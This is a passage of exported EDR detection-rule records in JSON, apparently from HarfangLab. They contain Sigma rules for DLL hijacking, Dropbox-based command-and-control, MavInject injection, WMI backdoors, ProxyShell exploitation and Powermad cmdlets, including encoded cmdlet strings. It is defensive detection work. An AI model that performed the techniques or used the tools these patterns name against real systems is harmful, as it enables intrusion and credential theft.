'?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2eedf312-fb18-46f6-8ce9-aed5bedd3dd7",
"rule_name": "DLL Hijacking via systeminfo.exe",
"rule_description": "Detects potential Windows DLL Hijacking via systeminfo.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2f4b9ca0-a3f3-4e38-a62f-aedbfe8a362c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.602948Z",
"creation_date": "2026-03-23T11:45:34.602952Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.602972Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securelist.com/bad-magic-apt/109087/",
"https://attack.mitre.org/techniques/T1071/001/"
],
"name": "t1071_001_suspicious_url_request_to_dropbox.yml",
"content": "title: Suspicious URL Request to the Dropbox API\nid: 2f4b9ca0-a3f3-4e38-a62f-aedbfe8a362c\ndescription: |\n Detects suspicious URL requests to the Dropbox API.\n Adversaries can use legitimate webservices to hide malicious command and control traffic.\n The Powermagic malware is known to use the Dropbox API to communicate with the attackers.\n It is recommended to analyze the process performing the URL request to determine whether its network communication to the Dropbox API is legitimate.\nreferences:\n - https://securelist.com/bad-magic-apt/109087/\n - https://attack.mitre.org/techniques/T1071/001/\ndate: 2023/03/24\nmodified: 2025/09/23\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1071.001\n - attack.t1102.002\n - attack.exfiltration\n - attack.t1567.002\n - classification.Windows.Source.UrlRequest\n - classification.Windows.Behavior.Masquerading\n - classification.Windows.Behavior.Exfiltration\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: url_request\ndetection:\n selection:\n RequestUrlHost:\n - 'content.dropboxapi.com'\n - 'api.dropboxapi.com'\n\n filter_dropbox:\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Google Inc'\n - 'Google LLC'\n - 'Dropbox, Inc'\n - 'Piriform Software Ltd'\n\n filter_dropbox_useragent:\n UserAgent|startswith: 'DropboxWindowsApp/'\n\n exclusion_dropboxuniversal:\n ProcessOriginalFileName: 'DropboxUniversal.exe'\n\n exclusion_rekordbox:\n # https://api.dropboxapi.com/2/auth/token/revoke\n ProcessOriginalFileName: 'rekordbox.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'AlphaTheta Corporation'\n\n exclusion_totalcmd64:\n ProcessOriginalFileName: 'totalcmd64.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Ghisler Software GmbH'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2f4b9ca0-a3f3-4e38-a62f-aedbfe8a362c",
"rule_name": "Suspicious URL Request to the Dropbox API",
"rule_description": "Detects suspicious URL requests to the Dropbox API.\nAdversaries can use legitimate webservices to hide malicious command and control traffic.\nThe Powermagic malware is known to use the Dropbox API to communicate with the attackers.\nIt is recommended to analyze the process performing the URL request to determine whether its network communication to the DropBox API is legitimate.\n",
"rule_creation_date": "2023-03-24",
"rule_modified_date": "2025-09-23",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1071.001",
"attack.t1102.002",
"attack.t1567.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2f78ddbf-ec12-46ef-b5f4-1c5272a8acd3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.615612Z",
"creation_date": "2026-03-23T11:45:34.615615Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.615623Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Mavinject/",
"https://attack.mitre.org/techniques/T1218/",
"https://attack.mitre.org/techniques/T1055/001/"
],
"name": "t1218_mavinject.yml",
"content": "title: Process Injected via MavInject\nid: 2f78ddbf-ec12-46ef-b5f4-1c5272a8acd3\ndescription: |\n Detects an attempt to open a process by mavinject.exe.\n This can be used by attackers to inject and execute an arbitrary DLL on any processes.\n It is recommended to check process' parents and the opened process for suspicious actions or content.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Mavinject/\n - https://attack.mitre.org/techniques/T1218/\n - https://attack.mitre.org/techniques/T1055/001/\ndate: 2021/06/16\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - attack.t1055.001\n - classification.Windows.Source.ProcessAccess\n - classification.Windows.LOLBin.Mavinject\n - classification.Windows.Behavior.ProcessInjection\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: process_access\ndetection:\n selection:\n GrantedAccess: '0x10143a'\n ProcessOriginalFileName:\n - 'mavinject32.exe'\n - 'mavinject64.exe'\n\n exclusion_appvisvsubsystems:\n ProcessCommandLine|contains:\n - '\\AppVIsvSubsystems32.dll'\n - '\\AppVIsvSubsystems64.dll'\n\n exclusion_appv:\n ProcessParentImage: '?:\\Windows\\System32\\AppVClient.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'Microsoft Windows'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2f78ddbf-ec12-46ef-b5f4-1c5272a8acd3",
"rule_name": "Process Injected via MavInject",
"rule_description": "Detects an attempt to open a process by mavinject.exe.\nThis can be used by attackers to inject and execute an arbitrary DLL on any processes.\nIt is recommended to check process' parents and the opened process for suspicious actions or content.\n",
"rule_creation_date": "2021-06-16",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1055.001",
"attack.t1218"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2f8e4b3a-9c7d-4e6f-8a1b-5d3c9e7f2a4b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.624544Z",
"creation_date": "2026-03-23T11:45:34.624546Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.624550Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/mattifestation/WMI_Backdoor",
"https://attack.mitre.org/techniques/T1546/003/",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1546_003_wmi_backdoor_trigger_cmdlet.yml",
"content": "title: WMIBackdoor PowerShell Cmdlet Executed\nid: 2f8e4b3a-9c7d-4e6f-8a1b-5d3c9e7f2a4b\ndescription: |\n Detects the execution of the WMIBackdoor.ps1 PowerShell script used to create WMI event subscription backdoors.\n This script establishes persistent malicious WMI event consumers that trigger on specific system events, allowing attackers to maintain access and execute arbitrary code.\n WMI event subscriptions are a common persistence mechanism that can survive reboots and are often difficult to detect through standard security tools.\n It is recommended to investigate the WMI event subscriptions on the system via the associated telemetry, analyze the triggered actions and payloads, and review the process tree for the parent process that executed this cmdlet.\nreferences:\n - https://github.com/mattifestation/WMI_Backdoor\n - https://attack.mitre.org/techniques/T1546/003/\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2025/11/07\nmodified: 2025/12/08\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1546.003\n - attack.t1059.001\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.HackTool.WMIBackdoor\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: powershell_event\ndetection:\n selection:\n ScriptBlockText|contains:\n - 'New-WMIBackdoorTrigger'\n - 'New-WMIBackdoorAction'\n - 'Register-WMIBackdoor'\n\n condition: selection\nlevel: high\nconfidence: strong\n\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2f8e4b3a-9c7d-4e6f-8a1b-5d3c9e7f2a4b",
"rule_name": "WMIBackdoor PowerShell Cmdlet Executed",
"rule_description": "Detects the execution of the WMIBackdoor.ps1 PowerShell script used to create WMI event subscription backdoors.\nThis script establishes persistent malicious WMI event consumers that trigger on specific system events, allowing attackers to maintain access and execute arbitrary code.\nWMI event subscriptions are a common persistence mechanism that can survive reboots and are often difficult to detect through standard security tools.\nIt is recommended to investigate the WMI event subscriptions on the system via the associated telemetry, analyze the triggered actions and payloads, and review the process tree for the parent process that executed this cmdlet.\n",
"rule_creation_date": "2025-11-07",
"rule_modified_date": "2025-12-08",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1546.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2f9bedc8-2825-415e-a921-7af30eb2aa12",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.092287Z",
"creation_date": "2026-03-23T11:45:34.092289Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.092294Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.mandiant.com/resources/pst-want-shell-proxyshell-exploiting-microsoft-exchange-servers",
"https://redcanary.com/blog/blackbyte-ransomware/",
"https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/",
"https://attack.mitre.org/techniques/T1190/",
"https://attack.mitre.org/techniques/T1505/003/"
],
"name": "t1190_proxyshell_vulnerability_exploitation.yml",
"content": "title: Microsoft Exchange Server Vulnerability Exploitation\nid: 2f9bedc8-2825-415e-a921-7af30eb2aa12\ndescription: |\n Detects a possible exploitation of CVE-2021-31207 (aka ProxyShell) related to Microsoft Exchange server, that allows an attacker to write files to the system.\n The ProxyShell vulnerabilities consist of three vulnerabilities (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207) affecting on-premises Microsoft Exchange servers that allow attackers to perform a pre-authenticated remote code execution.\n It is recommended to analyze the files written to disk to look for webshells or any suspicious content.\nreferences:\n - https://www.mandiant.com/resources/pst-want-shell-proxyshell-exploiting-microsoft-exchange-servers\n - https://redcanary.com/blog/blackbyte-ransomware/\n - https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/\n - https://attack.mitre.org/techniques/T1190/\n - https://attack.mitre.org/techniques/T1505/003/\ndate: 2022/07/08\nmodified: 2025/04/11\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1190\n - attack.persistence\n - attack.t1505.003\n - cve.2021-31207\n - classification.Windows.Source.Filesystem\n - classification.Windows.Exploit.Exchange\n - classification.Windows.Exploit.ProxyShell\n - classification.Windows.Exploit.CVE-2021-34473\n - classification.Windows.Exploit.CVE-2021-34523\n - classification.Windows.Exploit.CVE-2021-31207\n - classification.Windows.Behavior.InitialAccess\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection:\n Image|endswith: '\\MSExchangeMailboxReplication.exe'\n Path|endswith:\n - '.aspx'\n - '.asp'\n - '.ashx'\n\n condition: selection\nlevel: high\n# level: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2f9bedc8-2825-415e-a921-7af30eb2aa12",
"rule_name": "Microsoft Exchange Server Vulnerability Exploitation",
"rule_description": "Detects a possible exploitation of CVE-2021-31207 (aka ProxyShell) related to Microsoft Exchange server, that allows an attacker to write files to the system.\nThe ProxyShell vulnerabilities consist of three vulnerabilities (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207) affecting on-premises Microsoft Exchange servers that allow attackers to perform a pre-authenticated remote code execution.\nIt is recommended to analyze the files written to disk to look for webshells or any suspicious content.\n",
"rule_creation_date": "2022-07-08",
"rule_modified_date": "2025-04-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.initial_access",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1190",
"attack.t1505.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2fd97120-c808-466a-81ed-6aabf72403a2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.604632Z",
"creation_date": "2026-03-23T11:45:34.604636Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.604643Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/Kevin-Robertson/Powermad",
"https://www.netspi.com/blog/technical/network-penetration-testing/exploiting-adidns/",
"https://www.netspi.com/blog/technical/network-penetration-testing/machineaccountquota-transitive-quota/",
"https://attack.mitre.org/techniques/T1059/001/",
"https://attack.mitre.org/techniques/T1557/001/"
],
"name": "t1059_001_powershell_malicious_cmdlet_powermad_cmd.yml",
"content": "title: Malicious PowerShell Powermad Commandlets in Command-line\nid: 2fd97120-c808-466a-81ed-6aabf72403a2\ndescription: |\n Detects various malicious commandlets in PowerShell scripts, generally associated with the Powermad framework.\n The Powermad framework is generally associated with Active Directory Internal DNS (ADIDNS) exploitation for privilege escalation and credential collection through LLMNR poisoning (along with tools such as Inveigh) and SMB Relaying.\n It is recommended to investigate the parent process for suspicious activities as well as other malicious actions stemming from the PowerShell host process.\nreferences:\n - https://github.com/Kevin-Robertson/Powermad\n - https://www.netspi.com/blog/technical/network-penetration-testing/exploiting-adidns/\n - https://www.netspi.com/blog/technical/network-penetration-testing/machineaccountquota-transitive-quota/\n - https://attack.mitre.org/techniques/T1059/001/\n - https://attack.mitre.org/techniques/T1557/001/\ndate: 2022/10/12\nmodified: 2025/04/10\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - attack.credential_access\n - attack.collection\n - attack.t1557.001\n - attack.defense_evasion\n - attack.t1550.002\n - attack.persistence\n - attack.privilege_escalation\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Script.PowerShell\n - classification.Windows.Framework.PowerMad\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_powershell:\n - Image|endswith: '\\powershell.exe'\n - OriginalFileName: 'PowerShell.EXE'\n selection_cmdlet:\n CommandLine|contains:\n # ================================== Machine Account Quota functions ==================================\n # Return machine account attributes.\n - 'Get-MachineAccountAttribute'\n - 'RwBlAHQALQBNAGEAYwBoAGkAbgBlAEEAYwBjAG8AdQBuAHQAQQB0AHQAcgBpAGIAdQB0AGUA'\n - 'cAZQB0AC0ATQBhAGMAaABpAG4AZQBBAGMAYwBvAHUAbgB0AEEAdAB0AHIAaQBiAHUAdABlA'\n - 
'HAGUAdAAtAE0AYQBjAGgAaQBuAGUAQQBjAGMAbwB1AG4AdABBAHQAdAByAGkAYgB1AHQAZQ'\n # Returns Machine Account Creator. Usually only set when the node was created by an unprivileged user.\n - 'Get-MachineAccountCreator'\n - 'RwBlAHQALQBNAGEAYwBoAGkAbgBlAEEAYwBjAG8AdQBuAHQAQwByAGUAYQB0AG8Acg'\n - 'cAZQB0AC0ATQBhAGMAaABpAG4AZQBBAGMAYwBvAHUAbgB0AEMAcgBlAGEAdABvAHIA'\n - 'HAGUAdAAtAE0AYQBjAGgAaQBuAGUAQQBjAGMAbwB1AG4AdABDAHIAZQBhAHQAbwByA'\n # Disables a machine account.\n - 'Disable-MachineAccount'\n - 'RABpAHMAYQBiAGwAZQAtAE0AYQBjAGgAaQBuAGUAQQBjAGMAbwB1AG4AdA'\n - 'QAaQBzAGEAYgBsAGUALQBNAGEAYwBoAGkAbgBlAEEAYwBjAG8AdQBuAHQA'\n - 'EAGkAcwBhAGIAbABlAC0ATQBhAGMAaABpAG4AZQBBAGMAYwBvAHUAbgB0A'\n # Enables a machine account.\n - 'Enable-MachineAccount'\n - 'RQBuAGEAYgBsAGUALQBNAGEAYwBoAGkAbgBlAEEAYwBjAG8AdQBuAHQA'\n - 'UAbgBhAGIAbABlAC0ATQBhAGMAaABpAG4AZQBBAGMAYwBvAHUAbgB0A'\n - 'FAG4AYQBiAGwAZQAtAE0AYQBjAGgAaQBuAGUAQQBjAGMAbwB1AG4AdA'\n # Creates a new machine account through an encrypted LDAP request. Can then be used with the `runas` command.\n - 'New-MachineAccount'\n - 'TgBlAHcALQBNAGEAYwBoAGkAbgBlAEEAYwBjAG8AdQBuAHQA'\n - '4AZQB3AC0ATQBhAGMAaABpAG4AZQBBAGMAYwBvAHUAbgB0A'\n - 'OAGUAdwAtAE0AYQBjAGgAaQBuAGUAQQBjAGMAbwB1AG4AdA'\n # Removes a machine account with a privileged account.\n - 'Remove-MachineAccount'\n - 'UgBlAG0AbwB2AGUALQBNAGEAYwBoAGkAbgBlAEEAYwBjAG8AdQBuAHQA'\n - 'IAZQBtAG8AdgBlAC0ATQBhAGMAaABpAG4AZQBBAGMAYwBvAHUAbgB0A'\n - 'SAGUAbQBvAHYAZQAtAE0AYQBjAGgAaQBuAGUAQQBjAGMAbwB1AG4AdA'\n # Set attributes for an account that was created with Powermad.\n - 'Set-MachineAccountAttribute'\n - 'UwBlAHQALQBNAGEAYwBoAGkAbgBlAEEAYwBjAG8AdQBuAHQAQQB0AHQAcgBpAGIAdQB0AGUA'\n - 'MAZQB0AC0ATQBhAGMAaABpAG4AZQBBAGMAYwBvAHUAbgB0AEEAdAB0AHIAaQBiAHUAdABlA'\n - 'TAGUAdAAtAE0AYQBjAGgAaQBuAGUAQQBjAGMAbwB1AG4AdABBAHQAdAByAGkAYgB1AHQAZQ'\n # Recursively creates Machine Accounts, allowed due to the Transitive Machine Account Quota and updates of the ms-DS-CreatorSID attribute.\n - 
'Invoke-AgentSmith'\n - 'SQBuAHYAbwBrAGUALQBBAGcAZQBuAHQAUwBtAGkAdABoA'\n - 'kAbgB2AG8AawBlAC0AQQBnAGUAbgB0AFMAbQBpAHQAaA'\n - 'JAG4AdgBvAGsAZQAtAEEAZwBlAG4AdABTAG0AaQB0AGgA'\n # ========================================= ADIDNS Functions ==========================================\n # Used to add or delete ADIDNS dynamic DNS records if secure dynamic updates are configured on a DC.\n - 'Invoke-DNSUpdate'\n - 'SQBuAHYAbwBrAGUALQBEAE4AUwBVAHAAZABhAHQAZQ'\n - 'kAbgB2AG8AawBlAC0ARABOAFMAVQBwAGQAYQB0AGUA'\n - 'JAG4AdgBvAGsAZQAtAEQATgBTAFUAcABkAGEAdABlA'\n # Tombstone an ADIDNS node.\n - 'Disable-ADIDNSNode'\n - 'RABpAHMAYQBiAGwAZQAtAEEARABJAEQATgBTAE4AbwBkAGUA'\n - 'QAaQBzAGEAYgBsAGUALQBBAEQASQBEAE4AUwBOAG8AZABlA'\n - 'EAGkAcwBhAGIAbABlAC0AQQBEAEkARABOAFMATgBvAGQAZQ'\n # Revive tombstoned node.\n - 'Enable-ADIDNSNode'\n - 'RQBuAGEAYgBsAGUALQBBAEQASQBEAE4AUwBOAG8AZABlA'\n - 'UAbgBhAGIAbABlAC0AQQBEAEkARABOAFMATgBvAGQAZQ'\n - 'FAG4AYQBiAGwAZQAtAEEARABJAEQATgBTAE4AbwBkAGUA'\n # Return values that populate a node attribute.\n - 'Get-ADIDNSNodeAttribute'\n - 'RwBlAHQALQBBAEQASQBEAE4AUwBOAG8AZABlAEEAdAB0AHIAaQBiAHUAdABlA'\n - 'cAZQB0AC0AQQBEAEkARABOAFMATgBvAGQAZQBBAHQAdAByAGkAYgB1AHQAZQ'\n - 'HAGUAdAAtAEEARABJAEQATgBTAE4AbwBkAGUAQQB0AHQAcgBpAGIAdQB0AGUA'\n # Returns the owner of a node.\n - 'Get-ADIDNSNodeOwner'\n - 'RwBlAHQALQBBAEQASQBEAE4AUwBOAG8AZABlAE8AdwBuAGUAcg'\n - 'cAZQB0AC0AQQBEAEkARABOAFMATgBvAGQAZQBPAHcAbgBlAHIA'\n - 'HAGUAdAAtAEEARABJAEQATgBTAE4AbwBkAGUATwB3AG4AZQByA'\n # Gets a DACL (Discretionary Access Control List, which users/groups can access an object) of an ADIDNS node or zone.\n - 'Get-ADIDNSPermission'\n - 'RwBlAHQALQBBAEQASQBEAE4AUwBQAGUAcgBtAGkAcwBzAGkAbwBuA'\n - 'cAZQB0AC0AQQBEAEkARABOAFMAUABlAHIAbQBpAHMAcwBpAG8Abg'\n - 'HAGUAdAAtAEEARABJAEQATgBTAFAAZQByAG0AaQBzAHMAaQBvAG4A'\n # Returns ADIDNS zones.\n - 'Get-ADIDNSZone'\n - 'RwBlAHQALQBBAEQASQBEAE4AUwBaAG8AbgBlA'\n - 'cAZQB0AC0AQQBEAEkARABOAFMAWgBvAG4AZQ'\n - 'HAGUAdAAtAEEARABJAEQATgBTAFoAbwBuAGUA'\n # 
Adds access (ACE) to a node or zone DACL.\n - 'Grant-ADIDNSPermission'\n - 'RwByAGEAbgB0AC0AQQBEAEkARABOAFMAUABlAHIAbQBpAHMAcwBpAG8Abg'\n - 'cAcgBhAG4AdAAtAEEARABJAEQATgBTAFAAZQByAG0AaQBzAHMAaQBvAG4A'\n - 'HAHIAYQBuAHQALQBBAEQASQBEAE4AUwBQAGUAcgBtAGkAcwBzAGkAbwBuA'\n # Creates a new node thorugh an encrypted LDAP request.\n - 'New-ADIDNSNode'\n - 'TgBlAHcALQBBAEQASQBEAE4AUwBOAG8AZABlA'\n - '4AZQB3AC0AQQBEAEkARABOAFMATgBvAGQAZQ'\n - 'OAGUAdwAtAEEARABJAEQATgBTAE4AbwBkAGUA'\n # Creates a valid byte array for the dnsRecord attribute.\n - 'New-DNSRecordArray'\n - 'TgBlAHcALQBEAE4AUwBSAGUAYwBvAHIAZABBAHIAcgBhAHkA'\n - '4AZQB3AC0ARABOAFMAUgBlAGMAbwByAGQAQQByAHIAYQB5A'\n - 'OAGUAdwAtAEQATgBTAFIAZQBjAG8AcgBkAEEAcgByAGEAeQ'\n # Gets an SOA (Start of authority) serial number for a DNS zone and increments it.\n - 'New-SOASerialNumberArray'\n - 'TgBlAHcALQBTAE8AQQBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgBBAHIAcgBhAHkA'\n - '4AZQB3AC0AUwBPAEEAUwBlAHIAaQBhAGwATgB1AG0AYgBlAHIAQQByAHIAYQB5A'\n - 'OAGUAdwAtAFMATwBBAFMAZQByAGkAYQBsAE4AdQBtAGIAZQByAEEAcgByAGEAeQ'\n # Renames a node.\n - 'Rename-ADIDNSNode'\n - 'UgBlAG4AYQBtAGUALQBBAEQASQBEAE4AUwBOAG8AZABlA'\n - 'IAZQBuAGEAbQBlAC0AQQBEAEkARABOAFMATgBvAGQAZQ'\n - 'SAGUAbgBhAG0AZQAtAEEARABJAEQATgBTAE4AbwBkAGUA'\n # Removes a node.\n - 'Remove-ADIDNSNode'\n - 'UgBlAG0AbwB2AGUALQBBAEQASQBEAE4AUwBOAG8AZABlA'\n - 'IAZQBtAG8AdgBlAC0AQQBEAEkARABOAFMATgBvAGQAZQ'\n - 'SAGUAbQBvAHYAZQAtAEEARABJAEQATgBTAE4AbwBkAGUA'\n # Removes an ACE from a DACL.\n - 'Revoke-ADIDNSPermission'\n - 'UgBlAHYAbwBrAGUALQBBAEQASQBEAE4AUwBQAGUAcgBtAGkAcwBzAGkAbwBuA'\n - 'IAZQB2AG8AawBlAC0AQQBEAEkARABOAFMAUABlAHIAbQBpAHMAcwBpAG8Abg'\n - 'SAGUAdgBvAGsAZQAtAEEARABJAEQATgBTAFAAZQByAG0AaQBzAHMAaQBvAG4A'\n # Appends or overwrites node attributes.\n - 'Set-ADIDNSNodeAttribute'\n - 'UwBlAHQALQBBAEQASQBEAE4AUwBOAG8AZABlAEEAdAB0AHIAaQBiAHUAdABlA'\n - 'MAZQB0AC0AQQBEAEkARABOAFMATgBvAGQAZQBBAHQAdAByAGkAYgB1AHQAZQ'\n - 'TAGUAdAAtAEEARABJAEQATgBTAE4AbwBkAGUAQQB0AHQAcgBpAGIAdQB0AGUA'\n # Sets 
the owner of a Node, SeRestorePrivilege token required.\n - 'Set-ADIDNSNodeOwner'\n - 'UwBlAHQALQBBAEQASQBEAE4AUwBOAG8AZABlAE8AdwBuAGUAcg'\n - 'MAZQB0AC0AQQBEAEkARABOAFMATgBvAGQAZQBPAHcAbgBlAHIA'\n - 'TAGUAdAAtAEEARABJAEQATgBTAE4AbwBkAGUATwB3AG4AZQByA'\n # Generating Kerberos AES-256 and 128 Keys for know username and password, this can be used as a PtH attack in InvokeDNSUPdate\n - 'Get-KerberosAESKey'\n - 'RwBlAHQALQBLAGUAcgBiAGUAcgBvAHMAQQBFAFMASwBlAHkA'\n - 'cAZQB0AC0ASwBlAHIAYgBlAHIAbwBzAEEARQBTAEsAZQB5A'\n - 'HAGUAdAAtAEsAZQByAGIAZQByAG8AcwBBAEUAUwBLAGUAeQ'\n condition: all of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2fd97120-c808-466a-81ed-6aabf72403a2",
